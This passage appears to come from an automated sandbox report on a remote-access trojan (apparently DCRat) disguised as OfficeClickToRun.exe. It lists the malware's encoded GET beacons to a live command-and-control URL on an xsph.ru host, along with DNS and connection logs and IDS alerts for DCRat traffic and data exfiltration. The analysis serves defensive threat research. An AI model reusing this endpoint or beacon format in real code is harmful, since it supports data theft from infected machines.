5580 | OfficeClickToRun.exe | GET | 200 | 141.8.192.217:80 | http://a1048688.xsph.ru/L1nc0In.php?EnMYdVOlhjyLuxwV=rhlpGQR2jcbNELIqDUaLb8GT&7949c3113baf8faccc2f8206ce931809=QZjdjNhV2Y5ITMxMTYmdjNmVTNhhDOhljY0QWO4QWMjlzYxIzN4IjN5kDO2MTO2MTMyYzN0kzM&c21ebdd65b88aaf7ffae2de46f46263a=gYxYDZ2QWN0ITOjVjZ0IGOyYmYlFmMhZ2M5YGNjBzMxQTMiJTOzMGN&d2130839ac106153b24ac33e3b551900=0VfiIiOiETZ3cTZhNDMmRTYjNmN2U2Y1gjZkV2MjhTMmJzNzQmMiwiIlBTO4ADMwMjMwEjZ4QGZ5MTNycTNlJmN3QDZzQ2MmdzMyMDN2ATZlJiOiADM5cjM5MzM5Y2MjNjZmJjMyYWOwYGZ2UTYldTMilDOiwiIkJTN2kzYkhTY1E2M5M2YzMTMlRjYiJDO2UjZzEzN5MTZ1EWZ3MmM2IiOiQDNxE2MzUmZjNDM2UTN5YmYiZWO1QGN4UjYhZmZ5YzNis3W | RU | - | - | whitelisted
5580 | OfficeClickToRun.exe | GET | 200 | 141.8.192.217:80 | http://a1048688.xsph.ru/L1nc0In.php?EnMYdVOlhjyLuxwV=rhlpGQR2jcbNELIqDUaLb8GT&7949c3113baf8faccc2f8206ce931809=QZjdjNhV2Y5ITMxMTYmdjNmVTNhhDOhljY0QWO4QWMjlzYxIzN4IjN5kDO2MTO2MTMyYzN0kzM&c21ebdd65b88aaf7ffae2de46f46263a=gYxYDZ2QWN0ITOjVjZ0IGOyYmYlFmMhZ2M5YGNjBzMxQTMiJTOzMGN&d2130839ac106153b24ac33e3b551900=0VfiIiOiETZ3cTZhNDMmRTYjNmN2U2Y1gjZkV2MjhTMmJzNzQmMiwiI4ImMiNTNxUWYjFjYxUWMmVGZlZWYyUWZmRjZmFWNlhzY2gjZkVzNkJiOiADM5cjM5MzM5Y2MjNjZmJjMyYWOwYGZ2UTYldTMilDOiwiIkJTN2kzYkhTY1E2M5M2YzMTMlRjYiJDO2UjZzEzN5MTZ1EWZ3MmM2IiOiQDNxE2MzUmZjNDM2UTN5YmYiZWO1QGN4UjYhZmZ5YzNis3W | RU | - | - | whitelisted
5580 | OfficeClickToRun.exe | GET | 200 | 141.8.192.217:80 | http://a1048688.xsph.ru/L1nc0In.php?EnMYdVOlhjyLuxwV=rhlpGQR2jcbNELIqDUaLb8GT&7949c3113baf8faccc2f8206ce931809=QZjdjNhV2Y5ITMxMTYmdjNmVTNhhDOhljY0QWO4QWMjlzYxIzN4IjN5kDO2MTO2MTMyYzN0kzM&c21ebdd65b88aaf7ffae2de46f46263a=gYxYDZ2QWN0ITOjVjZ0IGOyYmYlFmMhZ2M5YGNjBzMxQTMiJTOzMGN&788f8f72f0aa93e2493428a5ff5bdb83=d1nIlhjMmZWN4ITMykjN1M2YzczM3cTNiNDNkRGO2EjYjVGZjFmNygTZhJiOiADM5cjM5MzM5Y2MjNjZmJjMyYWOwYGZ2UTYldTMilDOiwiIkJTN2kzYkhTY1E2M5M2YzMTMlRjYiJDO2UjZzEzN5MTZ1EWZ3MmM2IiOiQDNxE2MzUmZjNDM2UTN5YmYiZWO1QGN4UjYhZmZ5YzNis3W&d2130839ac106153b24ac33e3b551900=… | RU | text | 104 b | whitelisted
5580 | OfficeClickToRun.exe | GET | 200 | 141.8.192.217:80 | http://a1048688.xsph.ru/L1nc0In.php?EnMYdVOlhjyLuxwV=rhlpGQR2jcbNELIqDUaLb8GT&7949c3113baf8faccc2f8206ce931809=QZjdjNhV2Y5ITMxMTYmdjNmVTNhhDOhljY0QWO4QWMjlzYxIzN4IjN5kDO2MTO2MTMyYzN0kzM&c21ebdd65b88aaf7ffae2de46f46263a=gYxYDZ2QWN0ITOjVjZ0IGOyYmYlFmMhZ2M5YGNjBzMxQTMiJTOzMGN&8b190146bf783a33c32f02b472d55240=… | RU | text | 104 b | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
6944 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
7044 | RUXIMICS.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
5488 | MoUsoCoreWorker.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
5488 | MoUsoCoreWorker.exe | 104.103.72.96:80 | crl.microsoft.com | Akamai International B.V. | AT | whitelisted
6944 | svchost.exe | 104.103.72.96:80 | crl.microsoft.com | Akamai International B.V. | AT | whitelisted
7044 | RUXIMICS.exe | 104.103.72.96:80 | crl.microsoft.com | Akamai International B.V. | AT | whitelisted
5488 | MoUsoCoreWorker.exe | 2.18.69.217:80 | www.microsoft.com | AKAMAI-AS | AT | whitelisted
6944 | svchost.exe | 2.18.69.217:80 | www.microsoft.com | AKAMAI-AS | AT | whitelisted

DNS requests

Domain | Resolved IPs | Reputation
settings-win.data.microsoft.com | 20.73.194.208, 40.127.240.158, 4.231.128.59 | whitelisted
google.com | 142.250.185.110 | whitelisted
crl.microsoft.com | 104.103.72.96, 2.23.154.57 | whitelisted
www.microsoft.com | 2.18.69.217 | whitelisted
a1048688.xsph.ru | 141.8.192.217 | whitelisted
config.edge.skype.com | 13.107.42.16 | whitelisted
edge.microsoft.com | 204.79.197.239, 13.107.21.239 | whitelisted
edge-mobile-static.azureedge.net | 13.107.246.45 | whitelisted
business.bing.com | 13.107.6.158 | whitelisted
bzib.nelreports.net | 2.19.126.152, 2.19.126.145 | whitelisted

Threats

PID | Process | Class | Message
2172 | svchost.exe | Misc activity | ET INFO Observed DNS Query to xsph .ru Domain
5580 | OfficeClickToRun.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET)
5580 | OfficeClickToRun.exe | Potentially Bad Traffic | ET HUNTING Observed POST to xsph .ru Domain
5580 | OfficeClickToRun.exe | A Network Trojan was detected | ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt)
7484 | msedge.exe | Not Suspicious Traffic | INFO [ANY.RUN] Google Hosted Libraries (ajax .googleapis .com) (4 hits)
4 ETPRO signatures available at the full report
No debug info